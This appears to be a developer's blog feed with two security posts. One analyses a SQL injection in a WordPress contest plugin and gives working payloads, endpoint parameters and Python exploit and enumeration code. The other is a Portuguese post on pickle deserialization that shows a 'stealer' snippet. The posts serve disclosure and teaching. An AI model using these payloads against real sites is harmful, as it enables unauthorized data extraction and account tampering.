DEV Community: cardoso The latest articles on DEV Community by cardoso (@cardosource). https://dev.to/cardosource https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F757473%2Ffa450055-876d-4b45-9d14-f311e08af64b.jpeg DEV Community: cardoso https://dev.to/cardosource en From POC to Patch: Analyzing the Contest Gallery 28.1.4 Vulnerability cardoso Thu, 04 Jun 2026 21:41:12 +0000 https://dev.to/cardosource/from-poc-to-patch-analyzing-the-contest-gallery-2814-vulnerability-1738 https://dev.to/cardosource/from-poc-to-patch-analyzing-the-contest-gallery-2814-vulnerability-1738 <p>The Contest <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-3180" rel="noopener noreferrer">Gallery WordPress plugin, version 28.1.4</a>, contains a critical Boolean-Blind SQL Injection vulnerability in the admin-ajax.php endpoint. An unauthenticated attacker can exploit this flaw to manipulate SQL queries, invalidate user activation keys, and compromise database integrity.</p> <p><strong>Root Cause</strong></p> <p>The vulnerability resides in the function responsible for resending confirmation emails (<em>post_cg1l_resend_unconfirmed_mail_frontend</em>). The <em>cgl_mail</em> parameter is received via POST and handled as follows:</p> <p><code>$ReceiverMail = sanitize_email($_POST['cgl_mail']);<br> $wpdb-&gt;get_row("SELECT ... WHERE Field_Content = '$ReceiverMail'");<br> </code></p> <p><strong>Why</strong> <code>sanitize_email()</code> <strong>is Insufficient</strong></p> <p>WordPress's <em>sanitize_email()</em> function validates email format according to RFC 5321, but does NOT escape SQL characters. Worse: the single quote_ (<em><strong>'</strong></em>)_ is explicitly allowed in the local part of the email <strong>(</strong>before the <em>@</em><strong>)</strong>, enabling arbitrary SQL injection.</p> <p><strong>Bypass Example:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>aaaaaaa'OR/**/1=1#@test.com _-&gt; survives sanitization_ /**/ -&gt; MySQL comment replaces spaces OR 1=1 -&gt; always true condition_ # -&gt; comments out the remainder of the query_ </code></pre> </div> <p><strong>Exploitation Explanation (step by step)</strong></p> <p>The exploitation is Boolean-Blind, meaning the attacker cannot see returned data directly but infers information through differences in HTTP responses (status, body size, application behavior).</p> <p>Vulnerable Endpoint</p> <p><code>POST /wp-admin/admin-ajax.php</code></p> <p>Request Parameters:</p> <ul> <li>action: post_cg1l_resend_unconfirmed_mail_frontend,description: Routes to vulnerable function</li> <li>cgl_mail: 'OR/**/1=1#<a class="mentioned-user" href="https://dev.to/test">@test</a>.com - description : SQL injection vector</li> <li>cgl_page_id: 1 - description Auxiliary parameter</li> <li>cgl_activation_key: description (empty) Not needed for exploit</li> <li>cg_nonce: valid nonce - description CSRF protection (collectable)</li> </ul> <p>Functional Payload</p> <p><code>aaaaaaa'OR/**/1=1#@test.com</code></p> <p>Original vulnerable query:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">wp_contest_gal1ery_create_user_entries</span> <span class="k">WHERE</span> <span class="n">Field_Content</span> <span class="o">=</span> <span class="s1">'INJECTION_HERE'</span> <span class="k">LIMIT</span> <span class="mi">1</span> <span class="n">Query</span> <span class="k">after</span> <span class="n">injection</span> <span class="p">(</span><span class="k">TRUE</span><span class="p">):</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">wp_contest_gal1ery_create_user_entries</span> <span class="k">WHERE</span> <span class="n">Field_Content</span> <span class="o">=</span> <span class="s1">'aaaaaaa'</span><span class="k">OR</span><span class="cm">/**/</span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="o">#@</span><span class="n">test</span><span class="p">.</span><span class="n">com</span><span class="s1">' LIMIT 1 </span></code></pre> </div> <p>WHERE Field_Content = 'aaaaaaa' OR 1=1 -- commented out the rest<br> Since 1=1 is always true, the query returns the first available record. The plugin then takes this result and generates a new activation_key, invalidating the original key of the affected user.</p> <p><strong>TRUE vs FALSE Distinction</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>TRUE : 'OR/**/1=1#@test.com - Query returns records ---&gt; new activation_key generated FALSE : 'OR/**/1=2#@test.com - Query returns empty ---&gt; no plugin action </code></pre> </div> <p>This behavioral difference enables boolean enumeration (extracting data one bit at a time).</p> <p><strong>Code Theory Explanation</strong></p> <p>The <a href="https://github.com/cardosource/cve-2026-3180" rel="noopener noreferrer">exploit</a> implements a boolean-blind probe to detect the vulnerability and demonstrate its impact through behavioral differences between true and false conditions.</p> <p>Code Structure<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">send_payload</span><span class="p">(</span><span class="n">mail</span><span class="p">):</span> <span class="n">data</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">action</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">post_cg1l_resend_unconfirmed_mail_frontend</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">cgl_mail</span><span class="sh">"</span><span class="p">:</span> <span class="n">mail</span><span class="p">,</span> <span class="sh">"</span><span class="s">cgl_page_id</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">1</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">cgl_activation_key</span><span class="sh">"</span><span class="p">:</span> <span class="sh">""</span><span class="p">,</span> <span class="sh">"</span><span class="s">cg_nonce</span><span class="sh">"</span><span class="p">:</span> <span class="n">NONCE</span><span class="p">,</span> <span class="p">}</span> <span class="k">return</span> <span class="n">requests</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="n">URL</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">data</span><span class="p">)</span> </code></pre> </div> <p>Why This Structure Works:<br> Correct endpoint:<code>admin-ajax.php</code> is WordPress's universal AJAX handler</p> <p>Specific action: <code>post_cg1l_resend_unconfirmed_mail_frontend</code> is registered without authentication (<code>wp_ajax_nopriv_*</code>)</p> <p>cgl_mail parameter: injection vector that flows directly into the SQL query</p> <p>Detection Logic<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">r_true</span> <span class="o">=</span> <span class="nf">send_payload</span><span class="p">(</span><span class="sh">"</span><span class="s">aaaaaaa</span><span class="sh">'</span><span class="s">OR/**/1=1#@test.com</span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="n">r_true</span><span class="p">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span><span class="p">:</span> <span class="n">status_code</span> <span class="o">=</span> <span class="n">r_true</span><span class="p">.</span><span class="n">status_code</span> </code></pre> </div> <p><strong>Boolean-Blind Inference Theory:</strong></p> <p>Status<br> 'OR/<strong>/1=1# TRUE Yes Yes 200<br> 'OR/</strong>/1=2# FALSE No No 200 (different body)</p> <p>Important note: The current code only checks status 200. A complete exploit would compare body length (<code>len(r_true.text</code>)) or specific content.</p> <p><strong>The "Magic" Payload</strong></p> <p><code>payload = "'OR/**/1=1#@test.com' and 'OR/**/1=2#@test.com"</code></p> <p>Payload Anatomy:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>'OR/**/1=1#@test.com │ │ │ │ │ │ │ └── # → comments out the rest of the query (including '@test.com' and LIMIT 1) │ │ └── 1=1 → always true condition │ └── /**/ → MySQL comment (ignores spaces) └── ' → closes the query's string literal </code></pre> </div> <p>What the Code Proves (and what it doesn't yet do)</p> <p>The vulnerability exists</p> <p>The payload bypasses sanitize_email()</p> <p>Status 200 is returned</p> <p>The endpoint is accessible without authentication</p> <p>Response comparison (TRUE vs FALSE)</p> <p>Enumeration loop (character by character)</p> <p>Extraction of emails, activation_keys, or password hashes</p> <p><strong>Example Evolution for Enumeration</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">boolean_query</span><span class="p">(</span><span class="n">condition</span><span class="p">):</span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"'</span><span class="s">OR/**/</span><span class="si">{</span><span class="n">condition</span><span class="si">}</span><span class="s">#@test.com</span><span class="sh">"</span> <span class="n">response</span> <span class="o">=</span> <span class="nf">send_payload</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="c1"># If body size larger than baseline → TRUE </span> <span class="k">return</span> <span class="nf">len</span><span class="p">(</span><span class="n">response</span><span class="p">.</span><span class="n">text</span><span class="p">)</span> <span class="o">&gt;</span> <span class="n">baseline_length</span> <span class="c1"># Usage: boolean_query("ASCII(SUBSTRING(user_login,1,1))&gt;97") </span></code></pre> </div> <p>Theoretical Conclusion</p> <p>The script serves as a minimum Proof of Concept (PoC) that:</p> <p>Confirms the existence of SQL injection</p> <p>Demonstrates sanitize_email() bypass</p> <p>Establishes the foundation for a complete boolean exploit</p> <p>Documents the behavioral difference between TRUE and FALSE conditions</p> analytics python hackathon Pickle.loads() Executando Código Arbitrário cardoso Tue, 06 Jan 2026 23:04:56 +0000 https://dev.to/cardosource/pickleloads-executando-codigo-arbitrario-2hnj https://dev.to/cardosource/pickleloads-executando-codigo-arbitrario-2hnj <p>O módulo <a href="">pickle</a> do Python fornece mecanismos para serialização binária de objetos, onde o "pickling" transforma estruturas de objetos em fluxos de bytes e o "unpickling" restaura essas estruturas a partir dos bytes (Python Software Foundation, 2024). No entanto, a própria documentação alerta sobre riscos de segurança significativos.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faveah4ux90svn5qpdqtn.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faveah4ux90svn5qpdqtn.jpg" alt=" " width="141" height="154"></a></p> <blockquote> <p>É aquela amizade boa mas tem detalhes que vai ferrar com você</p> </blockquote> <p>Nooooossa, que módulo eficiente! Serializa tudo!</p> <p>Você sabe que vai dar merda</p> <p>Todo mundo avisa que vai dar merda</p> <p>A documentação GRITA que vai dar merda</p> <p>Mas... Ah, dessa vez vai ser diferente!</p> <p>Foco nobres camaradas....</p> <p>O pickle é usado por uma razão simples: vai executar o código automaticamente durante a desserialização isso nunca foi um bug é o design que se tornou uma vulnerabilidade.</p> <p>Vamos ao código principal :</p> <p><strong>1</strong></p> <p><code>stealer = LocalDataCollector()<br> malicious_pickle = pickle.dumps(stealer) # Serializa o objeto<br> </code></p> <p><strong>2</strong><br> <code><br> result = pickle.loads(malicious_pickle) # DESSERIALIZAÇÃO = EXECUÇÃO<br> </code></p> <p><em>pickle.dumps(obj)</em>: Converte objeto Python para bytes</p> <p><em>pickle.loads(bytes)</em>: Converte bytes para objeto Python EXECUTANDO CÓDIGO</p> <h2> E lógico um códi completo para testar. </h2> <blockquote> <p>Em cenários reais é criado um tipo de coletor de dados e enviado para algum local ou sequestro dos dados, botnet ou minerar bitcoin as possibilidade são muitas.</p> </blockquote> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg7desvqorftv3o3rrc1k.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg7desvqorftv3o3rrc1k.jpg" alt=" " width="800" height="520"></a></p> <p>Esse é meu primeiro post.</p> <p>código fonte completo: <a href="">github.com/cardosource/</a><br> teste: <a href="">...cardosource/actions/</a></p> <p>até mais...</p> programming security